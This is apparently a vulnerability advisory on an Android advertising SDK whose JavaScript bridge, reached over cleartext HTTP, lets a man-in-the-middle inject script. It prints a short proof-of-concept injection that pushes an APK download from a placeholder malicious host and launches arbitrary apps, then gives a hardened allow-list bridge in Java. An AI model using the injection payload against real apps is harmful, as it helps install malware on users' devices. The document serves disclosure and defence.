Ad SDK without SSL enables MiTM attacks

StartAppSDK talks to its server over plain HTTP. Inside the SDK, the class com.startapp.android.publish.JSInterface exposes the following methods to JavaScript:

  • externalLinks
  • openApp

Because the transport is unauthenticated, an attacker in a MiTM position can inject HTML/JavaScript into the response, for example:

window.location.replace("market://details?id=com.malicious.app.package.name");
startappwall.externalLinks("http://malicious.url/com.malicious.app.package.name.apk");

Once a user trusts the prompt and downloads and installs the APK, the attacker can lure the user to a page that contains the following code:

<script type="text/javascript">
   function Attack() {
       startappwall.openApp("", "com.malicious.app.package.name", "");
       startappwall.openApp("", "com.android.vending", ""); // Launch Google Play
       startappwall.openApp("", "com.google.android.gm", ""); // Launch Gmail
       startappwall.openApp("", "com.google.android.GoogleCamera", ""); // Launch Camera
       startappwall.openApp("", "com.google.android.calendar", ""); // Launch Calendar
       startappwall.openApp("", "com.android.gallery3d", ""); // Launch Photo Gallery
   }
</script>
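The root cause is a JavaScript bridge that launches any package name and opens any URL a page hands it, reachable from content fetched over cleartext HTTP. As an added illustration (not StartApp SDK code; HardenedBridge, its methods and the allow-listed package are hypothetical), this is how the same two bridge methods look when constrained to an allow-list and https-only navigation on an Android WebView. Moving the SDK's own traffic to HTTPS is a separate, necessary fix.

```java
// Added, hardened counterpart to the bridge above (illustrative; HardenedBridge and its
// methods are hypothetical names, not StartApp SDK code). Requires Android API 24+.
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import android.webkit.JavascriptInterface;
import android.webkit.WebResourceRequest;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.util.Arrays;

public final class HardenedBridge {
    // Only packages the host app deliberately deep-links to may be launched from JavaScript.
    private static final String[] ALLOWED_PACKAGES = {"com.example.partnerapp"}; // constructed
    private final Context ctx;
    public HardenedBridge(Context ctx) { this.ctx = ctx.getApplicationContext(); }

    // openApp: allow-list instead of launching whatever package name the page supplies.
    @JavascriptInterface
    public boolean openApp(String packageName) {
        if (packageName == null || !Arrays.asList(ALLOWED_PACKAGES).contains(packageName)) return false;
        Intent launch = ctx.getPackageManager().getLaunchIntentForPackage(packageName);
        if (launch == null) return false;
        ctx.startActivity(launch.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
        return true;
    }

    // externalLinks: https only; market:// and http:// APK links are refused before any Intent fires.
    @JavascriptInterface
    public boolean externalLinks(String url) {
        Uri uri = Uri.parse(url == null ? "" : url);
        if (!"https".equalsIgnoreCase(uri.getScheme()) || uri.getHost() == null) return false;
        ctx.startActivity(new Intent(Intent.ACTION_VIEW, uri).addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
        return true;
    }

    // Attach the bridge to a WebView that loads nothing over cleartext and blocks non-https navigations.
    public static void install(WebView webView, Context ctx) {
        webView.getSettings().setMixedContentMode(WebSettings.MIXED_CONTENT_NEVER_ALLOW);
        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView v, WebResourceRequest req) {
                // Returning true cancels the navigation: only https destinations proceed.
                return !"https".equalsIgnoreCase(req.getUrl().getScheme());
            }
        });
        webView.addJavascriptInterface(new HardenedBridge(ctx), "startappwall");
    }
}
```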

Video demo (embedded video not reproduced here)

Ref

How Javascript Bridge Can Allow Man-in-the-Middle Attacks - Appthority
